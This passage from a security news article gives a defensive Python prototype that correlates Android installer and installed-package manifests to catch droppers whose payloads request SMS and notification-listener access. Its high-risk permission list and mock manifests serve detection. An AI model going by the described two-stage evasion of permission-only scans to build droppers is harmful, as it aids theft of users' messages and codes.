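    The correlation the paragraph above calls for can be prototyped over the manifests alone: score the installer and the package it installed separately, then join them through the install-source record. The Python below is an added example, not code from the article or from the ThreatFabric research; the three manifests and the installer-to-installed records are constructed, preinstall_verdict is a deliberately simple stand-in for a permission-only pre-install scan and does not model Play Protect’s actual logic, and the HIGH_RISK set is an assumption that adds READ_SMS and the accessibility binding to the two permissions the article names.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Assumption: permissions whose request by a side-loaded app is treated as high risk.
HIGH_RISK = {
    "android.permission.RECEIVE_SMS",
    "android.permission.READ_SMS",
    "android.permission.BIND_NOTIFICATION_LISTENER_SERVICE",
    "android.permission.BIND_ACCESSIBILITY_SERVICE",
}

# Constructed manifests (not from the article or from any real sample).
# The dropper shell asks only for INTERNET and REQUEST_INSTALL_PACKAGES.
DROPPER_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.rewards">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES"/>
  <application><activity android:name=".UpdateActivity"/></application>
</manifest>"""

# The stage-two payload is where the SMS and notification-listener access appears.
PAYLOAD_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.rewards.core">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <application>
    <service android:name=".NotifSvc" android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE">
      <intent-filter><action android:name="android.service.notification.NotificationListenerService"/></intent-filter>
    </service>
  </application>
</manifest>"""

BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
</manifest>"""


def manifest_permissions(xml_text):
    """Return (package name, set of requested permissions including service binding permissions)."""
    root = ET.fromstring(xml_text)
    name_attr = f"{{{ANDROID_NS}}}name"
    perm_attr = f"{{{ANDROID_NS}}}permission"
    perms = {el.get(name_attr, "") for el in root.iter("uses-permission")}
    # Binding permissions such as the notification listener are declared on the
    # service element, not as uses-permission, so scan those too.
    perms |= {el.get(perm_attr) for el in root.iter("service") if el.get(perm_attr)}
    return root.get("package", ""), perms


def preinstall_verdict(perms):
    """Toy model of a permission-only pre-install scan: block only on a high-risk request."""
    return "block" if perms & HIGH_RISK else "allow"


def correlate(scans, install_events):
    """scans: {package: permissions}; install_events: (installer_pkg, installed_pkg) pairs.
    Flag packages whose installer passed the pre-install check holding
    REQUEST_INSTALL_PACKAGES and whose own manifest is high risk: the dropper chain."""
    findings = []
    for installer, installed in install_events:
        inst_perms = scans.get(installer, set())
        new_perms = scans.get(installed, set())
        if ("android.permission.REQUEST_INSTALL_PACKAGES" in inst_perms
                and preinstall_verdict(inst_perms) == "allow"
                and new_perms & HIGH_RISK):
            findings.append({"installer": installer, "installed": installed,
                             "escalated_to": sorted(new_perms & HIGH_RISK)})
    return findings


def run_demo():
    scans = dict(manifest_permissions(m) for m in (DROPPER_MANIFEST, PAYLOAD_MANIFEST, BENIGN_MANIFEST))
    # Constructed install-source records: (installer package, installed package).
    events = [("com.android.vending", "com.example.notes"),
              ("com.example.rewards", "com.example.rewards.core")]
    return correlate(scans, events)


if __name__ == "__main__":
    for f in run_demo():
        print(f"{f['installer']} -> {f['installed']}: {', '.join(f['escalated_to'])}")
```

    Scored on its own, the dropper manifest passes and the payload manifest is blocked, which is the article’s point: the two verdicts only become a detection when the install-source record ties the allowed installer to the blocked payload, so the post-install scan must carry the installer identity forward rather than judging each APK in isolation.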


    The post Threat Actors Adapting Android Droppers Even to Deploy Simple Malware to Stay Future-Proof appeared first on Cyber Security News.
